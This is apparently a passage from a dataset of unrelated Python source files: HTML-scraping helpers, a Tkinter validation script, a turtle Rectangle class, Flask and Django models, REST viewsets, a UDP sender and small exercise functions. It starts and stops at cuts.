lat_letters = "abcdefghijklmnopqrstuvwxyz"  # lowercase Latin alphabet
digits = "1234567890"
puncts = ".,-:;?!()[]{}"  # punctuation (currently unused by clear_string)
class html_level:
    # Describes one level of a contents/navigation hierarchy.
    # NOTE: class-level defaults are shared until an instance assigns its own.
    level_type = ""  # kind of selector this level represents: class, tag, ...
    level_name = ""
    level_id = ""  # position number in the contents list
class html_data:
    """A text fragment extracted from an HTML tree plus its source element.

    The attributes below are class-level defaults: __init__ fills in
    element/text/parent, while tag_name/class_name are assigned later by
    the extraction helpers.
    """
    element = None
    text = ""
    parent = None
    tag_name = ""
    class_name = ""

    def __init__(self, _element, _text, _parent):
        self.element = _element
        # A list of strings is flattened into one space-separated string.
        self.text = ' '.join(_text) if isinstance(_text, list) else _text
        self.parent = _parent

    def clone(self):
        # Shallow copy; tag_name/class_name intentionally revert to their
        # class defaults, matching the original constructor-based copy.
        return html_data(self.element, self.text, self.parent)
def is_digit(val):
    """Return True if *val* parses as a non-NaN number.

    Strings may use a comma as the decimal separator (e.g. "3,5").
    Anything float() cannot convert yields False.
    """
    if isinstance(val, str):  # was type(val) == str; isinstance is idiomatic
        val = val.replace(',', '.')
    try:
        return not math.isnan(float(val))
    except (TypeError, ValueError):
        # Narrowed from a bare except: only conversion failures are expected.
        return False
def get_closest_attribute(el, attr_name):
    """Walk up from el.element through its parents and return the first
    non-empty value of *attr_name*; "class" is mapped to the first CSS
    class found in the bs4 ``attrs`` dict.

    NOTE(review): if no ancestor carries the attribute, cur_parent
    eventually becomes None and the next iteration raises AttributeError —
    confirm callers always have a matching ancestor.
    """
    if attr_name == "class":
        # BeautifulSoup stores CSS classes inside the `attrs` dict.
        attr_name = "attrs"
    cur_parent = el.element
    while 1:
        if hasattr(cur_parent, attr_name):
            if cur_parent.__getattribute__(attr_name):
                if len(cur_parent.__getattribute__(attr_name)) > 0:
                    if attr_name == "attrs":
                        if cur_parent.attrs.get('class'):
                            # Only the first class name is returned.
                            return cur_parent.attrs.get('class')[0]
                        else:
                            flg_get_next_parent = True
                    else:
                        return cur_parent.__getattribute__(attr_name)
                else:
                    flg_get_next_parent = True
            else:
                flg_get_next_parent = True
        else:
            flg_get_next_parent = True
        if flg_get_next_parent:
            cur_parent = cur_parent.parent
def fit_to_list_v2(el, brothers, regime):
    """Return True when *el* matches the first element of *brothers* —
    by class name (preferred) or tag name — honouring *regime*
    (ALL / TAG_NAME / CLASS_NAME); returns None otherwise.

    NOTE(review): when the brother has an `attrs` dict but *el* has no
    class name, the tag-name branch is skipped entirely — confirm intended.
    """
    cr_tag_name = ""
    cr_class_name = ""
    if (regime.name == 'ALL' or regime.name == 'TAG_NAME') and hasattr(el, "name"):
        cr_tag_name = el.name
    if (regime.name == 'ALL' or regime.name == 'CLASS_NAME') and hasattr(el, "attrs"):
        cr_class_name = el.attrs.get("class")
    if cr_tag_name or cr_class_name:
        # Groups are homogeneous, so comparing against the first member suffices.
        brother = brothers[0]
        if hasattr(brother, "attrs") and cr_class_name != "":
            if brother.attrs.get("class") == cr_class_name:
                return True
        else:
            if hasattr(brother, "name") and cr_tag_name != "":
                if brother.name == cr_tag_name:
                    return True
def fit_to_list(el, brothers):
    """Return True when *el* matches the first element of *brothers* by
    class name (preferred) or tag name; returns None otherwise.

    NOTE(review): near-duplicate of fit_to_list_v2 without the regime
    filter — consider consolidating.
    """
    cr_tag_name = ""
    cr_class_name = ""
    if hasattr(el, "name"):
        cr_tag_name = el.name
    if hasattr(el, "attrs"):
        cr_class_name = el.attrs.get("class")
    if cr_tag_name or cr_class_name:
        # Groups are homogeneous, so comparing against the first member suffices.
        brother = brothers[0]
        if hasattr(brother, "attrs") and cr_class_name != "":
            if brother.attrs.get("class") == cr_class_name:
                return True
        else:
            if hasattr(brother, "name") and cr_tag_name != "":
                if brother.name == cr_tag_name:
                    return True
def is_element_ok(el):
    """Return True if *el* exposes a non-empty ``text`` attribute.

    The original returned True or (implicitly) None; this always returns a
    bool. All call sites only test truthiness, so they are unaffected.
    """
    return hasattr(el, 'text') and el.text is not None and len(el.text) > 0
def get_html_brothers_v2(el, regime):
    """Walk the subtree of *el* and, level by level, group sibling elements
    that share a class name or tag name (per *regime*); return only the
    groups with more than one member.

    NOTE(review): the matching loop has no break, so one element can be
    appended to several candidate groups in a single pass — confirm this
    is intended.
    """
    cr_brothers = []  # candidate groups for the current element's children
    total_brothers = []
    elements_to_check = []
    elements_to_check.append(el)
    while len(elements_to_check) > 0:
        new_el = elements_to_check.pop(0)
        if is_element_ok(new_el):
            if hasattr(new_el, "contents"):
                for cont in new_el.contents:
                    if is_element_ok(cont):
                        elements_to_check.append(cont)
                    flg_found = False
                    for brothers in cr_brothers:
                        if fit_to_list_v2(cont, brothers, regime):
                            brothers.append(cont)
                            flg_found = True
                    if not flg_found:
                        # Start a new candidate group seeded with this element.
                        new_list = []
                        new_list.append(cont)
                        cr_brothers.append(new_list[0:])
                # Keep only groups with at least two siblings, then reset
                # for the next parent's children.
                for brothers in cr_brothers:
                    if len(brothers) > 1:
                        total_brothers.append(brothers)
                cr_brothers = []
    return total_brothers
def get_html_brothers(el):
    """Like get_html_brothers_v2 but without the regime filter and without
    skipping text-less elements: group same-level relatives that share a
    class name or tag name and return the groups with more than one member.
    """
    cr_brothers = []  # candidate groups for the current element's children
    total_brothers = []
    elements_to_check = []
    elements_to_check.append(el)
    while len(elements_to_check) > 0:
        new_el = elements_to_check.pop(0)
        if hasattr(new_el,"contents"):
            for cont in new_el.contents:
                elements_to_check.append(cont)
                flg_found = False
                for brothers in cr_brothers:
                    if fit_to_list(cont, brothers):
                        brothers.append(cont)
                        flg_found = True
                if not flg_found:
                    # Start a new candidate group seeded with this element.
                    new_list = []
                    new_list.append(cont)
                    cr_brothers.append(new_list[0:])
            # Keep only groups with at least two siblings, then reset for
            # the next parent's children.
            for brothers in cr_brothers:
                if len(brothers) > 1:
                    total_brothers.append(brothers)
            cr_brothers = []
    return total_brothers
def get_contents_tree(el):
    """Flatten the subtree rooted at *el* into a list of html_data records:
    href values, other attribute values (e.g. the "old price" markup on
    kupivip), and non-trivial bare text nodes.

    NOTE(review): `elements_to_check` is appended to and removed from while
    the inner `for` iterates it; the surrounding `while 1` keeps draining
    the list so nothing is lost, but visit order is implementation-defined
    — confirm order does not matter to callers.
    """
    texts = [] #of html_data
    elements_to_check = []
    el_obj = html_data(el, "", el.parent)
    elements_to_check.append(el_obj)
    while 1:
        for new_el in elements_to_check:
            element_to_remove = new_el
            # Queue all children for later processing.
            if hasattr(new_el.element, "contents"):
                if len(new_el.element.contents) > 0:
                    for cont in new_el.element.contents:
                        elements_to_check.append(html_data(cont, "", new_el.element))
            if hasattr(new_el.element, "attrs"):
                if new_el.element.attrs.get("href"):
                    # Keep links whose target survives character filtering.
                    new_text = html_data(new_el.element, new_el.element.attrs["href"], new_el.parent)
                    if len(clear_string(new_text.text, rus_letters + lat_letters + digits)) > 0:
                        if new_el.element.name and new_el.element.name != "script":
                            new_text.class_name = get_closest_attribute(new_text, "class")
                            new_text.tag_name = get_closest_attribute(new_text, "name")
                            texts.append(new_text)
                elif hasattr(new_el.element, "attrs"): # get old price from kupivip
                    for attr in new_el.element.attrs:
                        if new_el.element.name and new_el.element.name != "script":
                            new_text = html_data(new_el.element, new_el.element.attrs[attr], new_el.parent)
                            new_text.class_name = get_closest_attribute(new_text, "class")
                            new_text.tag_name = get_closest_attribute(new_text, "name")
                            texts.append(new_text)
            elif "String" in str(type(new_el.element)):
                # Bare text node (bs4 NavigableString): keep if non-trivial.
                new_el_str = str(new_el.element)
                new_el_str = new_el_str.replace("\n","")
                new_el_str = new_el_str.strip()
                if len(new_el_str) > 0:
                    if len(clear_string(new_el_str, rus_letters + lat_letters + digits)) > 0:
                        if new_el.element.name and new_el.element.name != "script":
                            new_text = html_data(new_el.element, new_el_str, new_el.parent)
                            new_text.class_name = get_closest_attribute(new_text, "class")
                            new_text.tag_name = get_closest_attribute(new_text, "name")
                            texts.append(new_text)
            elements_to_check.remove(element_to_remove)
        if len(elements_to_check) == 0:
            break
    return texts
def find_html_element(html_el, field_name, field_val):
    """Breadth-first search the subtree of *html_el* and return the first
    element whose attribute *field_name* has *field_val* as its first
    value; returns None when nothing matches.

    NOTE(review): children of elements that HAVE an `attrs` dict but do not
    match are never descended into (only attr-less containers are queued)
    — confirm this asymmetry is intended.
    """
    all_elements = []
    for el in html_el.contents:
        if hasattr(el, "contents"):
            all_elements.append(el)
    elements_to_remove = []
    while(1):
        for el in all_elements:
            for cont in el.contents:
                if hasattr(cont, "attrs"):
                    for key in cont.attrs:
                        if key == field_name:
                            if cont.attrs[field_name][0] == field_val:
                                return cont
                elif hasattr(cont, "contents"):
                    all_elements.append(cont)
            elements_to_remove.append(el)
        # Drop the fully-expanded elements outside the iteration.
        for el in elements_to_remove:
            all_elements.remove(el)
        elements_to_remove.clear()
        if not all_elements:
            break
def clear_string(str_to_clear, legitimate_symbols):
    """Keep only the characters of *str_to_clear* whose lowercase form
    occurs in *legitimate_symbols*, then strip surrounding whitespace.

    The membership test is case-insensitive, but original character case
    is preserved in the result.
    """
    kept = [ch for ch in str_to_clear if legitimate_symbols.find(ch.lower()) != -1]
    return "".join(kept).strip()
def clear_link(link_to_clear, prefix):
    """Trim leading junk before the first 'h' or 'w' in *link_to_clear*
    and, when *prefix* carries an http(s) scheme, make sure the result
    does too.

    Returns "" when neither marker character occurs in the link.
    """
    # Earliest occurrence of either marker; -1 means "not found".
    positions = [p for p in (link_to_clear.find("h"), link_to_clear.find("w")) if p != -1]
    if not positions:
        return ""
    res = link_to_clear[min(positions):]
    # Prepend the scheme only for http/https prefixes, and only when the
    # trimmed link does not already start with "http".
    scheme = prefix.split(":")[0]
    if scheme[0] == 'h' and res.find("http") != 0:
        res = scheme + "://" + res
    return res
def execute_query(conn, query, time_limit=0):
    """Execute *query* on DB connection *conn*, retrying on failure.

    Retries until *time_limit* seconds have elapsed; with the default
    time_limit=0 a single failure gives up immediately. Returns the
    cursor's lastrowid on success, -1 on failure.
    """
    c = conn.cursor()
    # time.clock() was removed in Python 3.8; perf_counter() is the
    # documented replacement for measuring elapsed time.
    start = time.perf_counter()
    while 1:
        try:
            c.execute(query)
            conn.commit()
            return c.lastrowid
        except Exception:
            # Narrowed from a bare except so Ctrl-C still interrupts.
            # Give up once the retry budget is spent (or immediately when
            # no budget was given).
            if (time_limit > 0 and time.perf_counter() - start > time_limit) or time_limit == 0:
                print("unable to execute: " + query)
                return -1
def build_insert_expression(data_dict, table_to_insert):
    """
    creates INSERT INTO command
    :param data_dict: {fieldName: [fieldValue, flgStringType]} — when
        flgStringType is truthy the value is wrapped in single quotes
    :param table_to_insert: target table name
    :return: command str

    NOTE(review): values are interpolated directly into the SQL text with
    no escaping — only safe with trusted data.
    """
    columns = []
    rendered = []
    for field_name in data_dict:
        field_value = data_dict[field_name][0]
        flg_string_type = data_dict[field_name][1]
        columns.append(field_name)
        text = str(field_value)
        rendered.append("'" + text + "'" if flg_string_type else text)
    return (
        "INSERT INTO " + table_to_insert
        + " (" + ",".join(columns) + ")"
        + " VALUES (" + ",".join(rendered) + ")"
    )
20,724 | 483bcd0e10f7211eb0582d5673e2c5b3f2f2ae0d | '''
Speed Validator
This application is used to validate the crew's speed during their RSP validations. To use the application, the validation runs must be in their own folder.
Created on Oct 9, 2013
@author: Elliott Locke
'''
from Tkinter import Tk
from tkFileDialog import askdirectory
import xml.etree.ElementTree as ET
import tkMessageBox
import os, sys, glob
import numpy
import matplotlib.pyplot as plt
from matplotlib.pyplot import legend
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.platypus import SimpleDocTemplate, Paragraph
# These imports below needed to be added in order to get a usable py app.
from reportlab.pdfbase import _fontdata_enc_winansi
from reportlab.pdfbase import _fontdata_enc_macroman
from reportlab.pdfbase import _fontdata_enc_standard
from reportlab.pdfbase import _fontdata_enc_symbol
from reportlab.pdfbase import _fontdata_enc_zapfdingbats
from reportlab.pdfbase import _fontdata_enc_pdfdoc
from reportlab.pdfbase import _fontdata_enc_macexpert
from reportlab.pdfbase import _fontdata_widths_courier
from reportlab.pdfbase import _fontdata_widths_courierbold
from reportlab.pdfbase import _fontdata_widths_courieroblique
from reportlab.pdfbase import _fontdata_widths_courierboldoblique
from reportlab.pdfbase import _fontdata_widths_helvetica
from reportlab.pdfbase import _fontdata_widths_helveticabold
from reportlab.pdfbase import _fontdata_widths_helveticaoblique
from reportlab.pdfbase import _fontdata_widths_helveticaboldoblique
from reportlab.pdfbase import _fontdata_widths_timesroman
from reportlab.pdfbase import _fontdata_widths_timesbold
from reportlab.pdfbase import _fontdata_widths_timesitalic
from reportlab.pdfbase import _fontdata_widths_timesbolditalic
from reportlab.pdfbase import _fontdata_widths_symbol
from reportlab.pdfbase import _fontdata_widths_zapfdingbats
def ruttingValidation():
    """Prompt for a folder of validation runs and collect the LCMSDistress
    XML file paths inside each run directory.

    NOTE(review): this is Python 2 code (Tkinter/tkFileDialog imports); the
    `fulldir > 0` string-vs-int comparison below only works on Python 2.
    The collected `xmlfilepaths` list is currently never used or returned.
    """
    #Get the folder to the route paths
    Tk().withdraw() #Not a full GUI
    options={"title": "Choose the folder which contains the validation runs.", "message": "This script will create a speed validation report based from the RSP files in your folder."}
    fileDir = askdirectory(**options) #show an open dialog box - This is for the folder containing multiple routes.
    RouteDirs = get_immediate_subdirectories(fileDir)
    for dirs in RouteDirs:
        xmlPath = fileDir + '/' + dirs + "/LCMSDistress/"
        if os.path.exists(xmlPath) == True:
            fulldir = xmlPath
        else:
            # Sentinel meaning "no LCMSDistress folder for this run".
            fulldir = 0
        if fulldir > 0:
            xmlfilepaths = []
            os.chdir(fulldir)
            for files in glob.glob("*.xml"):
                xmlfilepaths.append(fulldir + files)
def parseXMLRut(filePath):
    """Parse *filePath* as XML.

    NOTE(review): the parsed root is never used or returned — this function
    looks unfinished; confirm intended behaviour before relying on it.
    """
    tree = ET.parse(filePath)
    root = tree.getroot()
def get_immediate_subdirectories(dirs):
    """Return the names of the direct child directories of *dirs*,
    in os.listdir() order."""
    entries = os.listdir(dirs)
    return [entry for entry in entries if os.path.isdir(os.path.join(dirs, entry))]


if __name__ == '__main__':
    ruttingValidation()
20,725 | ba83f7a044797e3749758aadad1f50610a027ed3 | '''rectangle.py for CS108, Homework 8.
Author: Keith VanderLinden and Victor Norman
Date: 7 April 2017
Modified by: Ivanna Rodriguez @imr6
'''
import turtle
import sys
class Rectangle:
    """An axis-aligned rectangle anchored at (x, y), drawable with turtle.

    The anchor is the top-left corner: render() draws rightward and then
    downward, and overlaps() treats (y - height) as the bottom edge.
    """

    def __init__(self, x=0, y=0, width=50, height=50, color='black'):
        """Create a rectangle; width and height must both be positive."""
        self._color = color
        self._x = x
        self._y = y
        if width <= 0 or height <= 0:
            # Reject degenerate rectangles up front.
            raise ValueError('Width and height must be positive.')
        self._width = width
        self._height = height

    def __str__(self):
        # Same format as the original concatenation-based version.
        return f'({self._x},{self._y}), {self._width}, {self._height}, {self._color}'

    def get_x(self):
        return self._x

    def get_y(self):
        return self._y

    def get_color(self):
        return self._color

    def get_width(self):
        return self._width

    def get_height(self):
        return self._height

    def get_area(self):
        return self._width * self._height

    def get_perimeter(self):
        return 2 * (self._width + self._height)

    def modify_width(self, delta=0.0):
        '''Modify the width of the rectangle by the given delta.
        Ensure that the width is still a positive number.'''
        if self._width + delta > 0:
            self._width += delta
        else:
            print('invalid width...')
            sys.exit(-1)

    def modify_height(self, delta=0.0):
        '''Modify the height of the rectangle by the given delta.
        Ensure that the height is still a positive number.'''
        if self._height + delta > 0:
            self._height += delta
        else:
            print('invalid height...')
            sys.exit(-1)

    def overlaps(self, rectangle2):
        '''
        Return True if this rectangle overlaps with the given rectangle2;
        False otherwise.
        '''
        # Disjoint exactly when one rectangle is completely to the left
        # of, or completely above, the other.
        disjoint = (
            self._x + self._width < rectangle2.get_x()
            or rectangle2.get_x() + rectangle2.get_width() < self._x
            or self._y - self._height > rectangle2.get_y()
            or rectangle2.get_y() - rectangle2.get_height() > self._y
        )
        return not disjoint

    def render(self, turtle):
        '''Draw the rectangle using the given turtle.'''
        turtle.penup()
        turtle.seth(0)
        turtle.color(self._color)
        turtle.goto(self._x, self._y)
        turtle.pendown()
        # Trace the outline clockwise: top, right, bottom, left edges.
        turtle.forward(self._width)
        turtle.right(90)
        turtle.forward(self._height)
        turtle.right(90)
        turtle.forward(self._width)
        turtle.right(90)
        turtle.forward(self._height)
#Testing — requires a display: opens a turtle-graphics window.
if __name__ == '__main__':
    window = turtle.Screen()
    pen = turtle.Turtle()
    #draw two rectangles and determine if they overlap
    r1 = Rectangle()#default rectangle
    r1.render(pen)
    print(r1)
    r2 = Rectangle(10, 10, 50, 50, 'red')
    r2.render(pen)
    print(r1.overlaps(r2))
    #try a valid rectangle and print its properties
    try:
        r6=Rectangle(100,100,500,400, 'violet')
        print(r6)
    except ValueError as ve:
        print(ve)
    #try invalid rectangles to raise exceptions (negative width/height)
    try:
        r3= Rectangle(0,0,-100,-250, 'blue')
        print(r3)
    except ValueError as ve:
        print(ve)
    try:
        r4= Rectangle(0,0,-100,300, 'blue')
        print(r4)
    except ValueError as ve:
        print(ve)
    try:
        r5= Rectangle(0,0,300,-250, 'blue')
        print(r5)
    except ValueError as ve:
        print(ve)
    # Keep the window open until clicked.
    pen.hideturtle()
    window.exitonclick()
20,726 | 4e1d66768096ef9b1d0dcbb890667de4249dc0af | # -*- coding: utf-8 -*-
#models.py
#models mapping to database
from flask_sqlalchemy import SQLAlchemy
from passlib.apps import custom_app_context as password_context #for password hashing
import re #for regular expression
db=SQLAlchemy()
def many_returns(query):
    """Serialize a multi-row query result into a list of plain dicts.

    Each row must expose an ``as_dict()`` method (see AddUpdateDelete).
    """
    return [row.as_dict() for row in query]
class AddUpdateDelete():
    """Mixin giving SQLAlchemy models commit-on-call CRUD helpers."""
    def add(self,resource):
        # Stage *resource* and commit immediately.
        db.session.add(resource)
        return db.session.commit()
    def update(self):
        # Persist pending attribute changes on already-loaded rows.
        return db.session.commit()
    def delete(self,resource):
        db.session.delete(resource)
        return db.session.commit()
    def as_dict(self):  # serialize a row into {column_name: value}
        return {c.name: getattr(self, c.name) for c in self.__table__.columns}
#class이름과 db table이름을 일치시킨다. 일치하지 않을땐 __tablename__="테이블명"으로 매칭
class member(db.Model, AddUpdateDelete):
    """Registered user account (table: member)."""
    idx=db.Column(db.Integer, primary_key=True)
    id=db.Column(db.String(16), unique=True, nullable=False)
    pw=db.Column(db.String(255), nullable=False)  # passlib-hashed password
    name=db.Column(db.String(20), nullable=False)
    college=db.Column(db.String(20), nullable=False)
    major=db.Column(db.String(20), nullable=False)
    undergrad_number=db.Column(db.Integer, nullable=False)
    email=db.Column(db.String(30), nullable=False)
    nickname=db.Column(db.String(20))
    regdate=db.Column(db.TIMESTAMP, server_default=db.func.current_timestamp(), nullable=False)
    level=db.Column(db.Integer, default=1)
    def verify_password(self, password):
        # Compare a plaintext password against the stored hash.
        return password_context.verify(password, self.pw)
    # Validate password strength and, when every rule passes, store its hash
    # (SHA-512 on 64-bit platforms, SHA-256 on 32-bit, via passlib).
    # Reduce the round count if hashing becomes too slow.
    # Returns a (error_message, ok_flag) tuple.
    def check_password_strength_and_hash_if_ok(self, password):
        if len(password)<8:
            return 'The password is too short.', False
        if len(password)>16:
            return 'The password is too long.', False
        if re.search(r'[a-zA-Z]', password) is None:
            return 'The password must include at least one alphabet', False
        if re.search(r'\d', password) is None:
            return 'The password must include at least one number', False
        if re.search(r"[!@#$%&'()*+,-./[\\\]^_`{|}~"+r'"]', password) is None:
            return 'The password must include at least one symbol', False
        self.pw=password_context.encrypt(password)
        return '', True
    def __init__(self,id,name,college,major,undergrad_number,email,nickname):
        self.id=id
        self.name=name
        self.college=college
        self.major=major
        self.undergrad_number=undergrad_number
        self.email=email
        if nickname:
            self.nickname=nickname
        else:  # fall back to the real name when no nickname was given
            self.nickname=name
class board(db.Model,AddUpdateDelete):
    """Bulletin-board post; parent/od/depth encode threaded replies."""
    idx=db.Column(db.Integer, primary_key=True)
    category=db.Column(db.Integer, db.ForeignKey('category.idx'), nullable=False)
    writer=db.Column(db.Integer, db.ForeignKey('member.idx'), nullable=False)
    parent=db.Column(db.Integer)  # idx of the post this one replies to
    od=db.Column(db.Integer)  # display order within a thread
    depth=db.Column(db.Integer)  # reply nesting level
    subject=db.Column(db.String(255), nullable=False)
    content=db.Column(db.TEXT)
    reg_date=db.Column(db.TIMESTAMP, server_default=db.func.current_timestamp(), nullable=False)
    hit=db.Column(db.Integer, default=0)  # view count
    goods=db.Column(db.Integer, default=0)  # like count
    def __init__(self,category,writer,parent,od,depth,subject,content):
        self.category=category
        self.writer=writer
        self.parent=parent
        self.od=od
        self.depth=depth
        self.subject=subject
        self.content=content
class category(db.Model,AddUpdateDelete):
    """Board category; `skin` names the template used to render it."""
    idx=db.Column(db.Integer, primary_key=True)
    name=db.Column(db.String(20),nullable=False)
    skin=db.Column(db.String(50))
    def __init__(self,name,skin):
        self.name=name
        self.skin=skin
class comment(db.Model,AddUpdateDelete):
    """Comment on a board post; deleted with its post (CASCADE)."""
    idx=db.Column(db.Integer, primary_key=True)
    bidx=db.Column(db.Integer, db.ForeignKey('board.idx',ondelete='CASCADE'), nullable=False)
    writer=db.Column(db.Integer, db.ForeignKey('member.idx'), nullable=False)
    od=db.Column(db.Integer)  # display order within the comment thread
    depth=db.Column(db.Integer)  # reply nesting level
    content=db.Column(db.TEXT)
    date=db.Column(db.TIMESTAMP, server_default=db.func.current_timestamp(), nullable=False)
    def __init__(self,bidx,writer,od,depth,content):
        self.bidx=bidx
        self.writer=writer
        self.od=od
        self.depth=depth
        self.content=content
class cms(db.Model,AddUpdateDelete):
    """Ledger entry: one deposit/withdrawal record per row."""
    idx=db.Column(db.Integer, primary_key=True)
    content=db.Column(db.VARCHAR(255))
    deposit=db.Column(db.Integer)
    withdraw=db.Column(db.Integer)
    date=db.Column(db.DATE)
    def __init__(self,content,deposit,withdraw,date):
        self.content=content
        self.deposit=deposit
        self.withdraw=withdraw
        self.date=date
class meta_data(db.Model, AddUpdateDelete):
    """Simple key/value store for site-wide settings."""
    key=db.Column(db.String(20), primary_key=True)
    value=db.Column(db.TEXT)
    def __init__(self, key, value):
        self.key=key
        self.value=value
class files(db.Model, AddUpdateDelete):
    """Uploaded-file record linked to a row of another table.

    NOTE(review): the `table`/`id` attribute names shadow common builtins
    and SQL keywords — verify the generated DDL quotes them correctly.
    """
    idx=db.Column(db.Integer, primary_key=True)
    table=db.Column(db.String(20))  # name of the owning table
    id=db.Column(db.Integer)  # primary key of the owning row
    origin_name=db.Column(db.VARCHAR(255))  # original upload filename
    file_name=db.Column(db.String(50))  # stored filename on disk
    reg_date=db.Column(db.TIMESTAMP)
    def __init__(self,table,id,origin_name,file_name,reg_date):
        self.table=table
        self.id=id
        self.origin_name=origin_name
        self.file_name=file_name
        self.reg_date=reg_date
|
20,727 | 3e40b7588fcb739c02cf8742b44c83889dc7517a | from rest_framework import authentication
from storeapp.models import Product, Products
from .serializers import ProductSerializer, ProductsSerializer
from rest_framework import viewsets
class ProductsViewSet(viewsets.ModelViewSet):
    """Full CRUD API for Products; accepts session or token authentication."""
    serializer_class = ProductsSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = Products.objects.all()
class ProductViewSet(viewsets.ModelViewSet):
    """Full CRUD API for Product; accepts session or token authentication."""
    serializer_class = ProductSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = Product.objects.all()
|
20,728 | 0d7413e19db0d9390df0da032c01a5b9439321a3 | import socket
def main():
    """Read lines from the keyboard and send each over UDP to a fixed peer,
    until the user types "exit" (which is sent before the loop ends)."""
    # Create a UDP socket.
    udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # Bind the local address (any interface, port 7890).
    udp_socket.bind(("", 7890))
    while True:
        # Read the payload to send from the keyboard (prompt is in Chinese:
        # "please enter the data to send").
        send_data = input("请输入要发送的数据:")
        a = "\n"
        # Send the payload, then a newline, to the hard-coded peer.
        # udp_socket.sendto("hahaha hello", <peer ip and port>)
        # udp_socket.sendto(b"hello udp JunJie %d \n" % i, ("192.168.0.108", 8080))
        udp_socket.sendto(send_data.encode("utf-8"), ("192.168.0.105", 8080))
        udp_socket.sendto(a.encode("utf-8"), ("192.168.0.105", 8080))
        if send_data == "exit":
            break
    # Close the socket.
    udp_socket.close()
if __name__ == '__main__':
    main()
|
20,729 | bc94cf0ce652f322bed90b45f9a065860426dbc0 | # coding:utf-8
from websocket_server import WebsocketServer
from websocket import create_connection
import ModulePack as MP
import threading
import time
import hashlib
"""
Called when core node contact
"""
def new_client(client, server):
    """Log the address of a core node that just connected."""
    peer_ip = client["address"][0]
    print(peer_ip + " contacted")
"""
Define websocket server
"""
def wsserver(address):
    """Start the websocket server on *address*:9998 and serve forever."""
    server = WebsocketServer(9998, host=address)
    server.set_fn_new_client(new_client)
    server.set_fn_message_received(msg_reaction)
    # Blocks the calling thread indefinitely.
    server.run_forever()
"""
Called when server receive message
"""
def msg_reaction(client, server, rec_msg):
    """Deserialize an incoming message (string -> dict via ModulePack)
    and dispatch it to react_func."""
    rec_json = MP.str_to_dic(rec_msg)
    react_func(rec_json)
"""
Define reaction to message
"""
def react_func(json_file):
    """Handle a parsed message; currently just prints its 'result' field."""
    print(json_file["result"])
"""
Send json file to opponent
"""
def ws_transmission(ws, json_file):
    """Serialize *json_file* (dict -> string via ModulePack) and send it
    over the websocket connection *ws*."""
    sendmsg = MP.dic_to_str(json_file)
    ws.send(sendmsg)
"""
Run server on sub thread
"""
class PBFTServer(threading.Thread):
    """Daemon thread hosting this leaf node's websocket server."""

    def __init__(self, address):
        threading.Thread.__init__(self)
        self.stop_event = threading.Event()
        # setDaemon() is deprecated since Python 3.10; assign the
        # `daemon` attribute directly instead.
        self.daemon = True
        self.address = address

    def stop(self):
        """Signal the thread to stop (cooperative)."""
        # NOTE(review): run() never checks stop_event — run_forever() blocks
        # until the process exits, so stop() has no effect today. The thread
        # being a daemon is what actually lets the program terminate.
        self.stop_event.set()

    def run(self):
        # Blocks forever serving websocket connections on `address`.
        wsserver(self.address)
if __name__ == "__main__":
    # Start the local websocket server in a daemon thread.
    address = MP.get_address("leaf_address.txt")
    serverthread = PBFTServer(address[0])
    serverthread.start()
    # Give the server a moment to bind before prompting.
    time.sleep(0.1)
    print ("If you are ready, input \"ok\"")
    while True:
        ready = input()
        if ready == "ok":
            break
    request_num = 0
    # Connect to the core node's websocket endpoint.
    ws_core = create_connection("ws://" + address[1] + ":9999/")
    while True:
        print ("input transaction data.")
        print ("input \"end\" if you finish")
        input_data = input()
        if input_data == "end":
            break
        else:
            # Sign the SHA-256 digest of the transaction with a fresh key pair
            # and ship the signed transaction to the core node.
            keys = MP.make_keys()
            hash_tra = hashlib.sha256(input_data.encode("utf-8")).hexdigest()
            enc_hash = MP.encrypt(int(hash_tra, 16), keys["key"], keys["mod"])
            tra_data = {}
            tra_data["title"] = "transaction"
            tra_data["requestID"] = address[0] + ":" + str(request_num)
            tra_data["mod"] = keys["mod"]
            tra_data["contents"] = input_data
            tra_data["signature"] = enc_hash
            ws_transmission(ws_core, tra_data)
            request_num += 1
    # Signal the server thread to stop (see PBFTServer.stop).
    serverthread.stop()
20,730 | 152d08a2d208be1ae0aaf57a76a87e6343f4f6a9 | from django.db import models
from django.utils import timezone
# Create your models here.
class CodeSnippet(models.Model):
    """A stored piece of code with creation/modification timestamps."""
    # Pass the callable itself, NOT `timezone.now()`: calling it here would
    # evaluate once at class-definition time and freeze that moment as the
    # default for every row. Django calls the callable per save.
    created = models.DateTimeField(default=timezone.now)
    modified = models.DateTimeField(default=timezone.now)
    snippet = models.TextField(blank=False, null=False)

    def __str__(self):
        """ Sensible string representation of a code snippet."""
        return "{0} \n created at: {1} modified at: {2}".format(self.snippet, self.created,
                                                                self.modified)

    def save(self, *args, **kwargs):
        """ Add created_at and updated_at timestamps. """
        # Only stamp `created` on first save (no primary key yet);
        # `modified` is refreshed on every save.
        if not self.id:
            self.created = timezone.now()
        self.modified = timezone.now()
        return super(CodeSnippet, self).save(*args, **kwargs)
20,731 | 18b3dcb06966686042d0efd4280d69638c186c3f | #diagonals sum kata
#https://www.codewars.com/kata/5592fc599a7f40adac0000a8
def sum_diagonals(matrix):
total = 0
range_vals = list(range(0, len(matrix)))
for i, j in list(zip(range_vals, range_vals[::-1])):
total += matrix[i][i] + matrix [j][i]
return total |
20,732 | 6c51ce92aa52898995d77c25e478130445de8a1f | def circular_shift_list1(lst, k):
length=len(lst)
for i in range(length-k):
lst.append(lst[i])
for i in range(length-k):
lst.pop(0)
return lst
def remove_below_avg(lst):
    """Remove, in place, every element that is <= the mean of *lst*.

    Returns the same (mutated) list object. Raises ZeroDivisionError on
    an empty list, exactly like the original.
    """
    avg = sum(lst) / len(lst)
    # Slice-assign a filtered copy so the caller's list is mutated in place.
    lst[:] = [x for x in lst if x > avg]
    return lst
def writeName(filename, firstName, lastName):
    """Write "<firstName> <lastName>" to *filename*, overwriting it."""
    # `with` guarantees the handle is closed even if write() raises.
    with open(filename, 'w') as f:
        f.write(firstName + " " + lastName)
def writeRandNumbers(filename, n):
    """Write *n* random integers in [1, 100] to *filename*, one per line."""
    import random
    # `with` guarantees the handle is closed even if a write raises.
    with open(filename, 'w') as f:
        for _ in range(n):
            f.write(str(random.randint(1, 100)) + "\n")
def sumColumn(filename):
    """Return the sum of the integers stored one per line in *filename*."""
    # The original opened the file and never closed it; `with` releases
    # the handle promptly.
    with open(filename, 'r') as f:
